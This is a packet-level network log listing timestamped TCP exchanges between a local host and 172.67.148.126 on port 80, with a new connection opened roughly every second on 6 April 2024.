Apr 6, 2024 09:29:29.977197886 CEST	80	49724	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:29.977204084 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:29.977243900 CEST	49724	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.100966930 CEST	80	49724	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.124515057 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.249034882 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.249166012 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.251229048 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.375611067 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.375672102 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.499991894 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.771745920 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.771934032 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.772193909 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:30.772242069 CEST	49725	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:30.896317959 CEST	80	49725	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.172570944 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:31.296713114 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.296808004 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:31.298966885 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:31.430789948 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.430867910 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:31.554888964 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.809593916 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.810053110 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:31.810121059 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:32.855849981 CEST	49727	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:32.980839014 CEST	80	49727	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.166909933 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.290868044 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.291093111 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.293190956 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.416980982 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.417077065 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.541301012 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.795572042 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.795605898 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.795677900 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.795747995 CEST	49728	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:33.919512033 CEST	80	49728	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:33.952749968 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.077133894 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.077209949 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.079276085 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.203393936 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.203481913 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.327692032 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.587708950 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.587846041 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.588246107 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.588324070 CEST	49729	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.712035894 CEST	80	49729	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.733474016 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.857753038 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.857861042 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.860100031 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:34.984673023 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:34.984730005 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.108875990 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.355005980 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.355089903 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.355164051 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.355226040 CEST	49731	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.479334116 CEST	80	49731	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.578759909 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.702987909 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.703161955 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.705322027 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.829684019 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:35.829746962 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:35.953999043 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.210764885 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.210802078 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.210892916 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.213253975 CEST	49734	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.339973927 CEST	80	49734	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.361392975 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.486223936 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.486342907 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.488684893 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.614818096 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.614898920 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.739263058 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.985990047 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.986094952 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:36.986232996 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:36.986294031 CEST	49737	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.110590935 CEST	80	49737	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.125916958 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.250247002 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.250356913 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.260471106 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.384681940 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.384936094 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.509084940 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.756086111 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.756195068 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.756227970 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.756351948 CEST	49739	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:37.880404949 CEST	80	49739	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:37.910063028 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.034770966 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.034951925 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.036926985 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.161381006 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.161511898 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.285943031 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.531016111 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.531135082 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.531152964 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.531277895 CEST	49740	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.655931950 CEST	80	49740	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.672739983 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.796947956 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.797125101 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.799314976 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:38.923544884 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:38.924406052 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.050535917 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.313935995 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.314131975 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.314517021 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.314601898 CEST	49741	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.438425064 CEST	80	49741	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.453876972 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.578296900 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.578450918 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.580791950 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.705039024 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:39.705121040 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:39.829420090 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.073115110 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.073246002 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.073246956 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.073312044 CEST	49742	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.197421074 CEST	80	49742	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.218314886 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.342788935 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.342892885 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.344957113 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.469182968 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.469245911 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.593657970 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.841494083 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.841583967 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.842073917 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.842127085 CEST	49743	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:40.965751886 CEST	80	49743	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:40.988198996 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.112446070 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.112561941 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.115113974 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.239356995 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.239449978 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.363733053 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.628089905 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.628304958 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.628757000 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.628818989 CEST	49744	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.752633095 CEST	80	49744	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.764405966 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.889147043 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:41.889246941 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:41.891259909 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.015708923 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.015759945 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.140295982 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.410334110 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.410420895 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.410466909 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.423798084 CEST	49745	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.548629999 CEST	80	49745	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.564198971 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.688267946 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.688488007 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.690473080 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.814923048 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:42.815066099 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:42.939079046 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.188643932 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.188769102 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.189410925 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.189866066 CEST	49746	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.312449932 CEST	80	49746	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.328073978 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.452178001 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.452394009 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.454363108 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.578435898 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.582252026 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.706413031 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.960227013 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.960333109 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:43.961147070 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:43.961194038 CEST	49747	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.084465981 CEST	80	49747	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.115567923 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.239952087 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.240093946 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.242162943 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.366343975 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.366413116 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.490942955 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.750694990 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.750854015 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.751652002 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.751704931 CEST	49748	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:44.875005007 CEST	80	49748	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:44.891537905 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.015762091 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.015897036 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.018069983 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.141813040 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.141906023 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.265796900 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.522923946 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.523073912 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.523077965 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.523129940 CEST	49749	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.646965027 CEST	80	49749	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.673168898 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.797265053 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.797468901 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.799676895 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:45.923760891 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:45.923952103 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.048609972 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.308871984 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.309077024 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.309622049 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.309680939 CEST	49750	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.433429956 CEST	80	49750	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.454530001 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.578685045 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.578927040 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.581120968 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.704963923 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:46.705096006 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:46.828922033 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.078301907 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.078433037 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.078440905 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.078497887 CEST	49751	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.202362061 CEST	80	49751	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.251521111 CEST	49752	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.376183987 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.376282930 CEST	49752	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.378472090 CEST	49752	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.505409002 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.505563021 CEST	49752	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:47.631999969 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.888562918 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.888664961 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:47.888736010 CEST	49752	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:48.013360023 CEST	80	49752	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:48.042567015 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:48.167718887 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:48.176640987 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:48.178973913 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:48.303556919 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:48.303620100 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:48.428203106 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:49.611900091 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:49.612087011 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:49.612169981 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:50.831202984 CEST	49753	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:50.956470966 CEST	80	49753	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:50.994519949 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.118750095 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.118829012 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.123132944 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.247973919 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.248116970 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.371952057 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.644701004 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.644768000 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.644829988 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.645164967 CEST	49755	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.768945932 CEST	80	49755	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.791635990 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.918164968 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:51.918488979 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:51.920859098 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.047785997 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.047920942 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.175138950 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.426291943 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.426661015 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.426877975 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.426947117 CEST	49756	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.552248001 CEST	80	49756	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.578718901 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.704516888 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.704613924 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.706701040 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.831125975 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:52.831208944 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:52.955466986 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.204463959 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.204600096 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.204762936 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.204813004 CEST	49757	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.328835964 CEST	80	49757	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.342950106 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.467792034 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.467925072 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.470084906 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.595690966 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.595801115 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.719978094 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.977397919 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.977660894 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:53.977997065 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:53.978121042 CEST	49758	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.101821899 CEST	80	49758	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.132925987 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.257194042 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.257373095 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.259588003 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.383671045 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.383791924 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.507740021 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.765850067 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.765877008 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.766031981 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.766113043 CEST	49759	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:54.890012980 CEST	80	49759	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:54.908348083 CEST	49760	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.032558918 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.032744884 CEST	49760	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.035047054 CEST	49760	80	192.168.2.6	172.67.148.126
Apr 6, 2024 09:29:55.159001112 CEST	80	49760	172.67.148.126	192.168.2.6
Apr 6, 2024 09:29:55.159293890 CEST	49760	80	192.168.2.6	172.67.148.126
